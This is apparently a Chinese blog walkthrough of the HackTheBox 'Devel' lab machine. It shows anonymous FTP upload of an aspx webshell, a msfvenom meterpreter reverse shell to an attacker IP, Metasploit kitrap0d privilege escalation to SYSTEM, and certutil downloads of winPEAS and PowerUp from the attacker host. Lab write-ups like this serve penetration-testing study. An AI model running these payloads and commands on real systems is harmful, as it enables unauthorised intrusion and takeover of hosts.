Hackthebox:Devel Walkthrough
预备知识
ftp anonymous登录、任意文件上传、msfvenom生成webshell、meterpreter后渗透
信息收集
nmap 探测一下开放端口和服务
nmap 10.10.10.5
结果如下
Nmap scan report for 10.10.10.5
Host is up (0.34s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
21/tcp open ftp
80/tcp open httpNmap done: 1 IP address (1 host up) scanned in 29.83 seconds
有个http的80端口,那么应该有web服务了,老规矩扫一下目录
扫一下目录
dirb http://10.10.10.5/
在扫目录的间歇,扫一扫有没有已知的漏洞nmap -script=vuln 10.10.10.5
不过后来没有扫出来什么
两边都在扫,不浪费时间,试一试ftp能不能匿名登录
ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17 01:06AM <DIR> aspnet_client
03-17-17 04:37PM 689 iisstart.htm
03-17-17 04:37PM 184946 welcome.png
226 Transfer complete.
发现这里有个目录比较有趣
ftp> cd aspnet_client
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17 01:06AM <DIR> system_web
226 Transfer complete.
ftp> cd system_web
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17 01:06AM <DIR> 2_0_50727
226 Transfer complete.
ftp> cd 2_0_50727
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
到这里感觉ftp进入的目录有点像web目录,这也和dirb已经出的结果一样
URL_BASE: http://10.10.10.5/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt-----------------GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.10.5/ ----
==> DIRECTORY: http://10.10.10.5/aspnet_client/
尝试直接传一个反向shell上去,因为是Windows,所以选择aspx的马
Getshell
这里直接使用kali自带的aspx马,另一个终端输入
cp /usr/share/webshells/aspx/cmdasp.aspx shell.aspx
之前ftp的终端,回到根目录输入命令
ftp> put ./shell.aspx
local: ./shell.aspx remote: ./shell.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
1442 bytes sent in 0.00 secs (62.5090 MB/s)
ftp>
在浏览器访问http://10.10.10.5/shell.aspx
执行命令成功,不过这个马比较一般,所以等下换一个马
看下系统架构systeminfo
Host Name: DEVEL
OS Name: Microsoft Windows 7 Enterprise
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: babis
Registered Organization:
Product ID: 55041-051-0948536-86302
Original Install Date: 17/3/2017, 4:17:31 ££
System Boot Time: 8/12/2020, 3:33:21 ££
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.[01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 1.023 MB
Available Physical Memory: 732 MB
Virtual Memory: Max Size: 2.047 MB
Virtual Memory: Available: 1.522 MB
Virtual Memory: In Use: 525 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.[01]: Intel(R) PRO/1000 MT Network ConnectionConnection Name: Local Area ConnectionDHCP Enabled: NoIP address(es)[01]: 10.10.10.5
没有什么好的aspx大马,所以只能用msf了,oscp估计也没法用冰蝎吧
使用msfvenom先生成一个反向大马
msfvenom -p windows/meterpreter/reverse_tcp LPORT=4444 LHOST=10.10.14.16 -f aspx -o reverse.aspx
再通过ftp传上去
本地开启一个msf的监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.14.16
set lport 4444
set ExitOnSession false
run
set ExitOnSession false
//运行这条命令后,4444端口会一直处于监听状态
meterpreter > background
[*] Backgrounding session 21...
msf5 exploit(multi/handler) > use exploit/windows/local/ms10_015_kitrap0d
msf5 exploit(windows/local/ms10_015_kitrap0d) > set session 21
session => 21
msf5 exploit(windows/local/ms10_015_kitrap0d) > set lhost 10.10.14.16
lhost => 10.10.14.16
msf5 exploit(windows/local/ms10_015_kitrap0d) > set lport 5555
lport => 5555
msf5 exploit(windows/local/ms10_015_kitrap0d) > run[*] Started reverse TCP handler on 10.10.14.16:5555
[*] Launching notepad to host the exploit...
[+] Process 3968 launched.
[*] Reflectively injecting the exploit DLL into 3968...
[*] Injecting exploit into 3968 ...
[*] Exploit injected. Injecting payload into 3968...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (180291 bytes) to 10.10.10.5
[*] Meterpreter session 27 opened (10.10.14.16:5555 -> 10.10.10.5:49159) at 2020-12-05 19:44:53 +0800
补充查找提权方式
use post/multi/recon/local_exploit_suggester
set session 21
run
[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 30 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
查看现在的权限
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > search -f user.txt.txt
Found 1 result...c:\Users\babis\Desktop\user.txt.txt (32 bytes)
后面是踩坑,大家可以不看
//本地进行监听 nc -lvp 4444
,浏览器访问http://10.10.10.5/reverse.aspx
//然后返回netcat监听的终端,发现已经建立连接了
//使用下面的脚本检测提权 https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
//先在本机启动一个http服务python -m SimpleHTTPServer 80
//在netcat的终端进行下载certutil -urlcache -split -f http://10.10.14.16/winPEAS.bat c:\inetpub\wwwroot\winPEAS.bat
//然后运行.\winPEAS.bat
,根据输出结果下载exp
searchsploit ms14-040
certutil -urlcache -split -f http://10.10.14.16/PowerUp.ps1 c:\inetpub\wwwroot\PowerUp.ps1
Hackthebox:Devel Walkthrough相关推荐
- Hackthebox:Granny Walkthrough(not use metasploit)
预备知识 nikto.nmap.iis6.0的webdav.davtest.kali自带webshell. 信息收集 nmap 10.10.10.15 只开了个80端口,那么还是web,浏览器访问目标 ...
- HackTheBox:Pandora靶场
HackTheBox:Pandora靶场 这个靶场是一台linux机器,上边搭载了两个cms,其中涉及到对信息搜集.ssh证书登录.suid提权.sql注入等知识的考验 信息搜集 nmap走一遍什么也 ...
- 转:devel包 和 非devel包的区别
devel 包主要是供开发用,至少包括以下2个东西: 头文件 链接库 有的还含有开发文档或演示代码. 以 glib 和 glib-devel 为例: 如果你安装基于 glib 开发的程序,只需要安装 ...
- 吐血规劝!程序员防猝死终极指南
快过年了,跟我可爱的小侄子通了个电话,上来就说,"叔叔你头发怎么变少了",我很痛心,我的小侄子,年纪轻轻的,眼神已经这么不好使了.但转念一想,这也是他对我的一种关心,作为叔叔,也该 ...
- Nervos 双周报第 3 期:佛系新年之后的开工大吉!
今年的朋友圈突然变得不那么活跃了?大家是否开始过上了佛系新年,不再是好友相聚胡吃海玩,而是安静地懒在家中陪伴家人看春晚?除夕之夜,公司大群「杭州七院」下起了红包雨,伴随着红包雨,大家一起看完了春晚,现 ...
- ros 消息队列与缓冲区_[ROS] [笔记(1)] 一个最简单的例子:Hello Robot(消息、发布者与订阅者)...
本例程包含如下内容: 1)创建编译 Package: 2)自定义消息: 3)发布者与订阅者. 0.Hello Robot 的场景: 我们想要完成这样一个场景: 1)有一系列 robot 排成一排(pu ...
- Linux学习笔记:rpm程序包管理
以CentOS为例,rpm程序包管理器的相关内容如下: CentOS的程序包管理器: 程序包的命名规则: 源代码包: software_name-VER ...
- ipython安装教程-CentOS 5安装IPython
话说上次给那台装CentOS 5的免费VPS升级了Python,这次我们继续来安装IPython. 一.IPython是什么 IPython是Python的交互式Shell,提供了代码自动补完,自动缩 ...
- linux软件包管理-rpm
1.程序包管理 功能:将编译好的应用程序的各组件组成文件打包成一个或几个程序包文件,从而更方便快捷实现程序包的安装升级,卸载和查询等管理操作 1 程序包的组成清单(每个程序包都单独实现) 文件清单 安 ...
- Linux下源码安装CodeBlocks
Linux下源码安装CodeBlocks qianghaohao(CodingNutter) 一. 安装平台说明: CentOs6.4-i686 gcc-4.4.7 二. 下载最新源码: http: ...
最新文章
- 为什么 Linux 需要 Swapping
- hdu 2049 不容易系列之(4)——考新郎 解题报告
- STM32 不断进入串口中断问题 解决方法
- java 调用远程服务_java调用(请求)远程服务地址
- ajax mysql项目 react_Github MIT开源银行电子支付系统(ReactJS+Nodejs+Mysql)
- java比较两个对象重写,不重写equals进行两个对象间的深度比较
- Ubuntu 中改变文件的默认打开方式(转)
- 三分法解决凸(凹)函数极值问题
- 利用计算机找出函数关系式,使用 CHOOSE 查找函数中类似于表的信息 - Excel公式函数运用大全...
- jenkins发送allure测试报告附件
- QT每日一练day21:鼠标事件
- Android自定义控件之自定义倒计时按钮
- Tableau Desktop 安装与破解
- NOI题库答案 (1.7 字符串基础)(21 - 25)
- Linux 克隆虚拟机引起的“Device eth0 does not seem to be present, delaying initialization”
- python对excel某一列求和-如何对某一列自动分组,统计求和
- 中国移动物联网开放平台OneNET学习笔记(1)——设备接入(MQTT协议)OneNET Studio篇
- 用生成对抗网络,将普通图片转换为梵高大作
- matplotlib.pyplot超详细入门总结
- 算法分析-C语言描述